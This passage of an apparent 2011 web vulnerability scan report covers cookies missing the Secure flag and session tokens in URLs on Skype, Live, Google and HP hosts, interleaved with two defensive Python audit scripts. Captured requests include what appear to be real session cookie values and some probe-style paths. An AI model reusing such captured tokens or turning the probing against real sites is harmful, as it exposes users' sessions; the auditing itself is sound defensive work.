If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
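Both findings above (a password form that submits over clear-text HTTP, and a cookie issued without the secure flag) can be checked from a captured response alone, and the scanner's per-instance note "appears to contain a session token" is itself a heuristic on the cookie name and value. The script below is an added example, not the scanner's code or any listed application's: it parses a raw HTTP response, reports each Set-Cookie with its Secure and HttpOnly attributes, applies a token-likeness heuristic of its own (suggestive name, or a long opaque value), and lists any form containing a password field whose action would post over plain HTTP. The response, cookie names and values, and the URL `https://www.example.com/` are constructed for illustration; the only page content reused is the `lc=en-US; path=/` cookie shape shown in the instances below.

```python
import re
from urllib.parse import urlsplit

# Constructed sample response (invented cookie names/values and form).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: lc=en-US; path=/\r\n"
    "Set-Cookie: PHPSESSID=9f3a8c1d2e4b5a6f7c8d9e0f1a2b3c4d; path=/; HttpOnly\r\n"
    "Set-Cookie: auth=YWxpY2U6c2VjcmV0dG9rZW4xMjM0; path=/; Secure; HttpOnly\r\n"
    "\r\n"
    "<html><body>"
    '<form id="loginForm" method="post" action="http://www.example.com/login">'
    '<input type="text" name="user"><input type="password" name="pass">'
    "</form></body></html>"
)

# Heuristic of this example, not the scanner's: a name hinting at a session
# or credential, or a long opaque value (hex / base64 / url-safe alphabet).
TOKEN_NAMES = re.compile(r"(sess|sid|token|auth|login)", re.I)
TOKEN_VALUE = re.compile(r"^[A-Za-z0-9+/=_-]{16,}$")

FORM_RE = re.compile(r"<form\b([^>]*)>(.*?)</form>", re.I | re.S)
ACTION_RE = re.compile(r"\baction=[\"']([^\"']*)[\"']", re.I)
PASSWORD_RE = re.compile(r"<input\b[^>]*\btype=[\"']password[\"']", re.I)


def parse_response(raw):
    """Split a raw response into (status line, [(header, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def looks_like_session_token(name, value):
    return bool(TOKEN_NAMES.search(name)) or bool(TOKEN_VALUE.match(value))


def audit_cookies(raw):
    """One dict per Set-Cookie header with the attributes that matter here."""
    _, headers, _ = parse_response(raw)
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cname, _, cvalue = parts[0].partition("=")
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        findings.append({
            "name": cname,
            "secure": "secure" in attrs,
            "httponly": "httponly" in attrs,
            "token_like": looks_like_session_token(cname, cvalue),
        })
    return findings


def risk(finding):
    """Mirror the report's wording: a token-like cookie without Secure is the
    serious case; a non-token cookie without Secure is a lesser one."""
    if finding["secure"]:
        return "ok"
    return "high" if finding["token_like"] else "low"


def password_forms_over_cleartext(raw, page_url):
    """Action URLs of password forms that would submit over plain HTTP.
    An empty or relative action inherits the scheme of page_url."""
    _, _, body = parse_response(raw)
    out = []
    for attrs, inner in FORM_RE.findall(body):
        if not PASSWORD_RE.search(inner):
            continue
        m = ACTION_RE.search(attrs)
        action = m.group(1) if m else ""
        scheme = urlsplit(action).scheme or urlsplit(page_url).scheme
        if scheme.lower() != "https":
            out.append(action or page_url)
    return out


if __name__ == "__main__":
    for f in audit_cookies(SAMPLE_RESPONSE):
        print(f"{f['name']:<10} secure={f['secure']!s:<5} httponly={f['httponly']!s:<5} "
              f"token_like={f['token_like']!s:<5} -> {risk(f)}")
    for action in password_forms_over_cleartext(SAMPLE_RESPONSE, "https://www.example.com/"):
        print("password form posts over clear-text HTTP:", action)
```

The heuristic deliberately errs toward flagging, which is why the report asks you to "review the contents of the cookie to determine its function": a language or locale cookie like `lc=en-US` is correctly rated low, but a short name such as `auth` is rated high on its name alone, and the final call is a manual one.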
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Host: login.skype.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: support.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: developer.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accessories HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /camera/skype-uvc-extension-unit-specification HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification/accessories HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification/certified-list HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification/odm-program HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /public/skypekit HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /public/skypekit/ HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /silk HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skypekit HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support/ HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The following cookie was issued by the application and does not have the secure flag set:
lang=en-us; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.headsets HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.phones HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.webcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.extras HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/skype.manager.setup HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/tvwebcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The following cookie was issued by the application and does not have the secure flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /si/login.aspx/x22 HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2491
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:27 GMT
Connection: close
<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:29 GMT
Connection: close
<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login HTTP/1.1
Host: secure.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
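The leakage paths listed above (browser history, server and proxy logs, bookmarks, and the Referer header on off-site links) all start from a URL, so the check is a URL check. The script below is an added example, not the scanner's code or any listed application's: it extracts the links from a page, reports query and path parameters that may carry a session token (a known session-parameter name, an opaque high-entropy value, or merely a suggestive name that needs manual review), and, when the page's own URL carries such a token, lists the off-site hosts to which a click would leak it through the Referer header. The HTML, the links and the hosts under example.com and example.org are constructed for illustration; the only thing borrowed from the page is a `campaign-token` parameter of the kind highlighted in the instance below.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample page; the links are invented and are not the report's.
SAMPLE_HTML = """
<a href="https://shop.example.com/account?product=landline-60&campaign-token=XEAADWKU">buy</a>
<a href="/checkout;jsessionid=0A1B2C3D4E5F60718293A4B5C6D7E8F9?step=2">checkout</a>
<a href="https://app.example.com/home?PHPSESSID=9f3a8c1d2e4b5a6f7c8d9e0f1a2b3c4d">home</a>
<a href="https://www.example.org/partner?ref=example">partner</a>
"""

HREF_RE = re.compile(r'href=["\']([^"\']+)["\']', re.I)

# Heuristics of this example, not the scanner's.
KNOWN_SESSION_PARAMS = {"jsessionid", "phpsessid", "aspsessionid",
                        "sessionid", "sid", "session", "token"}
NAME_HINT = re.compile(r"(sess|token|auth)", re.I)
OPAQUE_VALUE = re.compile(r"^[A-Fa-f0-9]{16,}$|^[A-Za-z0-9_-]{24,}$")

KNOWN = "known session parameter name"
OPAQUE = "opaque high-entropy value"
HINT = "name hint only (review manually)"


def token_params(url):
    """(name, value, reason) for every parameter that may carry a session
    token. Path parameters (;jsessionid=...) are checked as well as the query."""
    parts = urlsplit(url)
    candidates = []
    for seg in parts.path.split("/"):
        if ";" in seg:
            for p in seg.split(";")[1:]:
                n, _, v = p.partition("=")
                candidates.append((n, v))
    candidates += parse_qsl(parts.query, keep_blank_values=True)
    out = []
    for n, v in candidates:
        if n.lower() in KNOWN_SESSION_PARAMS:
            out.append((n, v, KNOWN))
        elif OPAQUE_VALUE.match(v):
            out.append((n, v, OPAQUE))
        elif NAME_HINT.search(n):
            out.append((n, v, HINT))
    return out


def scan_links(html):
    """Map each link that carries a suspect parameter to its findings."""
    found = {}
    for href in HREF_RE.findall(html):
        hits = token_params(href)
        if hits:
            found[href] = hits
    return found


def referer_exposure(page_url, html):
    """If page_url itself carries a token, every off-site link on the page is
    a place the token can leak via the Referer header. Returns those hosts."""
    if not token_params(page_url):
        return set()
    own = urlsplit(page_url).hostname
    hosts = set()
    for href in HREF_RE.findall(html):
        host = urlsplit(href).hostname
        if host and host != own:
            hosts.add(host)
    return hosts


if __name__ == "__main__":
    for href, hits in scan_links(SAMPLE_HTML).items():
        for name, value, reason in hits:
            print(f"{href}\n    {name}={value}  [{reason}]")
    page = "https://app.example.com/home?PHPSESSID=9f3a8c1d2e4b5a6f7c8d9e0f1a2b3c4d"
    print("Referer leak targets:", sorted(referer_exposure(page, SAMPLE_HTML)))
```

The third reason, a name hint on its own, exists because a name-only rule is what produces hits like the `campaign-token` parameter in the instance below: its short fixed value does not look like a session token, so the script files it for review rather than reporting it as one, which is the same judgement call the report leaves to the reader.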
Request
GET /en/2010/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:35 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 437288
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype - ...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a> ...[SNIP]...
<li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a> ...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a> ...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a> ...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a> ...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a> ...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a> ...[SNIP]...
<li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a> ...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a> ...[SNIP]...
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a> ...[SNIP]...
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a> ...[SNIP]... 
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a> ...[SNIP]...
Request
GET /en/campaigns_and_promotions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:01 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 175514
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Skype - ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a> ...[SNIP]... <li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a> ...[SNIP]... <li>Unlimited <a 